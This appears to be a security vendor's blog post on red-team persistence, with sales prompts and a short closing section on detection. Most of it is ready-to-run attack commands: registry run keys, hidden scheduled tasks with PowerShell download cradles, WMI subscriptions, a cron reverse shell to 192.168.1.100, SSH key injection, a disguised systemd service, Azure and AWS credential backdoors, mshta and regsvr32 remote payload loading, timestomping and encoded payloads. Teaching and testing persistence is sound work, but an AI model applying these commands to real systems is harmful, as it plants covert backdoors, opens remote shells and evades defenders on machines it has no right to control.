Red team operations do not end at initial access. In fact, gaining a foothold is only the beginning. The real challenge is staying inside the target environment long enough to simulate the full attack chain that a sophisticated threat actor would execute. That is where persistence comes in.
Persistence techniques allow red teamers to maintain access to compromised systems even after reboots, credential rotations, or partial incident response actions. Understanding these methods is critical for both offensive security professionals and defenders who want to understand what they are up against.
At Redfox Cybersecurity, our red team engagements go beyond surface-level testing. We simulate real-world advanced persistent threats so your organization can identify gaps before attackers do.
Persistence refers to any technique that allows an attacker to maintain their foothold on a target system across interruptions. These interruptions include system reboots, user logoffs, or defensive actions that may terminate an active session.
In the MITRE ATT&CK framework, persistence is a core tactic (TA0003) with dozens of documented techniques spanning Windows, Linux, macOS, and cloud environments. Red teamers simulate these techniques to test whether a target organization's detection and response capabilities can catch them in time.
A real adversary does not walk away after the first session closes. They plant mechanisms to re-establish control silently and reliably. If a red team engagement does not include persistence simulation, the blue team is only being tested against the easiest part of an attack, which is initial compromise.
Testing persistence gives security teams an opportunity to validate whether their EDR solutions, SIEM correlation rules, and threat hunting playbooks can identify subtle, low-noise access mechanisms planted deep in the environment.
Want to know if your detection capabilities are actually ready? Request a red team assessment from Redfox Cybersecurity and find out.
One of the oldest and most well-documented persistence mechanisms on Windows is the use of registry run keys. These keys instruct the operating system to execute a specified program every time a user logs in.
Common registry locations abused for persistence include:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
[cta]
A red teamer with local user access can add a payload using the command:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v RedTeamPersist /t REG_SZ /d "C:\Users\Public\beacon.exe" /f
[cta]
For elevated access scenarios, targeting HKLM instead of HKCU achieves system-wide persistence:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SvcAgent /t REG_SZ /d "C:\Windows\Temp\agent.exe" /f
[cta]
Defenders should monitor for unusual entries in these keys, especially those pointing to writable directories like Temp, AppData, or Public.
Windows Task Scheduler is a legitimate administrative tool that red teamers frequently abuse. Scheduled tasks can be configured to execute payloads at logon, at specific times, or triggered by system events.
Creating a scheduled task from the command line:
schtasks /create /tn "WindowsUpdateHelper" /tr "C:\Windows\Temp\updater.exe" /sc onlogon /ru SYSTEM /f
[cta]
For a more stealthy approach that mimics a legitimate maintenance task running every 15 minutes:
schtasks /create /tn "Microsoft\Windows\Maintenance\HealthCheck" /tr "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/stage2')" /sc minute /mo 15 /ru SYSTEM /f
[cta]
Red teams often name these tasks to blend in with legitimate Windows scheduled tasks, making detection harder for analysts who are not running a baseline comparison.
WMI-based persistence is one of the more advanced techniques in a red teamer's arsenal. It leverages the WMI event subscription system to execute arbitrary commands in response to system events, and it leaves no files in obvious locations.
A PowerShell example to create a WMI event subscription:
$filterArgs = @{
Name = 'PersistenceFilter'
EventNameSpace = 'root\cimv2'
QueryLanguage = 'WQL'
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Minutes = 0"
}
$filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $filterArgs
$consumerArgs = @{
Name = 'PersistenceConsumer'
CommandLineTemplate = 'C:\Windows\Temp\payload.exe'
}
$consumer = New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $consumerArgs
$bindingArgs = @{
Filter = [Ref] $filter
Consumer = [Ref] $consumer
}
New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $bindingArgs
[cta]
WMI subscriptions survive reboots and are invisible to basic file system scans, making them highly effective for long-dwell simulations.
DLL hijacking exploits the Windows DLL search order to load a malicious library in place of a legitimate one. When an application looks for a DLL in writable directories before the system directory, an attacker can plant a malicious version that gets loaded automatically.
A practical approach is to identify applications running from non-standard paths and check for missing DLLs using Process Monitor:
# Using PowerSploit's Find-PathDLLHijack
Import-Module .\PowerUp.ps1
Find-PathDLLHijack
[cta]
Then craft a malicious DLL that exports the same function names as the legitimate one and place it in the hijackable location.
Cron is the standard job scheduling utility on Linux systems. It is routinely abused by both attackers and red teamers to maintain persistence.
Adding a user-level cron job that beacons out every 5 minutes:
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'") | crontab -
[cta]
For system-level persistence with root access:
echo "*/10 * * * * root /usr/local/bin/.svc_monitor" >> /etc/crontab
[cta]
Red teamers often hide malicious cron entries in files under /etc/cron.d/ or by naming executables to resemble system binaries.
If SSH is enabled and the red teamer has write access to a target user's home directory, injecting an SSH public key provides a clean, persistent authentication path that survives password changes.
mkdir -p ~/.ssh
echo "ssh-rsa AAAA[attacker-pubkey] attacker@persist" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
[cta]
This technique is silent, reliable, and leaves no obvious indicators unless the blue team is auditing authorized_keys files regularly.
On modern Linux systems using systemd, creating a malicious service is an effective high-privilege persistence mechanism.
Create a service unit file:
cat > /etc/systemd/system/network-monitor.service << EOF
[Unit]
Description=Network Monitoring Service
After=network.target
[Service]
ExecStart=/usr/local/bin/.netmon
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable network-monitor
systemctl start network-monitor
[cta]
The service will start automatically on every boot, and blends in with legitimate monitoring services unless analysts audit enabled units.
If your Linux environment has never been stress-tested by a professional red team, Redfox Cybersecurity can simulate these exact attack chains against your infrastructure.
As organizations migrate to cloud-first environments, attackers have followed. Red teams must now simulate persistence across cloud control planes, not just endpoints.
In Azure Active Directory, red teamers often focus on application registrations, service principals, and guest account abuse to maintain long-term access.
Using the Az PowerShell module to add credentials to an existing app registration:
$app = Get-AzADApplication -DisplayName "LegitApp"
New-AzADAppCredential -ApplicationId $app.AppId -Password (ConvertTo-SecureString "Passw0rd@2025!" -AsPlainText -Force) -EndDate (Get-Date).AddYears(2)
[cta]
This provides an authentication path that survives user password resets and MFA changes, since it operates at the application identity layer.
In AWS environments, red teamers create secondary access keys or IAM users with administrative policies that serve as a durable backdoor.
aws iam create-user --user-name svc-monitor-prod
aws iam attach-user-policy --user-name svc-monitor-prod --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-monitor-prod
[cta]
A more subtle approach is adding an inline policy to an existing role that grants cross-account access to an attacker-controlled AWS account.
Sophisticated red teams avoid custom malware where possible. Instead, they abuse legitimate system binaries that are already trusted by security tools. This approach is known as living off the land and dramatically reduces detection rates.
Common LOLBin persistence examples on Windows:
Using mshta.exe to execute a remote HTA file at startup:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v MSHTAHelper /t REG_SZ /d "mshta.exe http://192.168.1.100/persist.hta" /f
[cta]
Using regsvr32.exe for scriptlet execution:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v RegSvc /t REG_SZ /d "regsvr32 /s /n /u /i:http://192.168.1.100/payload.sct scrobj.dll" /f
[cta]
These techniques use binaries signed by Microsoft, which means application whitelisting solutions may allow them through without question.
Red teamers do not just plant persistence mechanisms. They evaluate whether those mechanisms can be detected by the blue team. Key evasion strategies include:
Timestomping to modify file metadata and blend with legitimate system files:
$file = Get-Item "C:\Windows\Temp\payload.exe"
$file.CreationTime = (Get-Date "2023-01-15 08:22:00")
$file.LastWriteTime = (Get-Date "2023-01-15 08:22:00")
$file.LastAccessTime = (Get-Date "2023-01-15 08:22:00")
[cta]
Using encoded PowerShell payloads to avoid signature-based detection:
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.100/payload")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell.exe -EncodedCommand $encoded
[cta]
Understanding offensive persistence is only half the equation. Defenders need to know what to look for. Key detection opportunities include:
Monitoring registry run keys for new or unexpected entries using Sysmon Event ID 13. Auditing scheduled tasks with schtasks /query /fo LIST /v and comparing against a known-good baseline. Reviewing WMI subscriptions regularly using Get-WMIObject -Namespace root\subscription -Class __EventFilter. Inspecting cron entries across all users on Linux, including system-wide cron directories. Auditing cloud IAM for new access keys, guest accounts, or application credential additions.
Detection engineering is only as good as the scenarios it has been tested against. Engage Redfox Cybersecurity to run a full red team simulation and validate your detection rules against real-world persistence techniques before an actual adversary does.
Persistence simulation is a non-negotiable component of any mature red team engagement. From registry manipulation and scheduled tasks on Windows, to cron jobs and systemd services on Linux, to IAM backdoors in cloud environments, skilled attackers have a broad toolkit. The techniques covered in this blog represent a fraction of what sophisticated threat actors deploy in the wild.
Organizations that only test for initial compromise are leaving the hardest parts of an attack untested. Real adversaries dwell inside environments for days, weeks, or months. Your defenses need to be built to catch them during that dwell time, not just at the front door.
Redfox Cybersecurity delivers red team engagements that go the full distance, from initial access to long-term persistence simulation, with detailed reporting that maps every finding to MITRE ATT&CK. Our specialists operate with the same mindset as advanced threat actors so your security team gets a genuine test of their detection and response capabilities.
Explore our penetration testing and red team services at Redfox Cybersecurity and take the first step toward understanding what real adversarial persistence looks like inside your environment.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
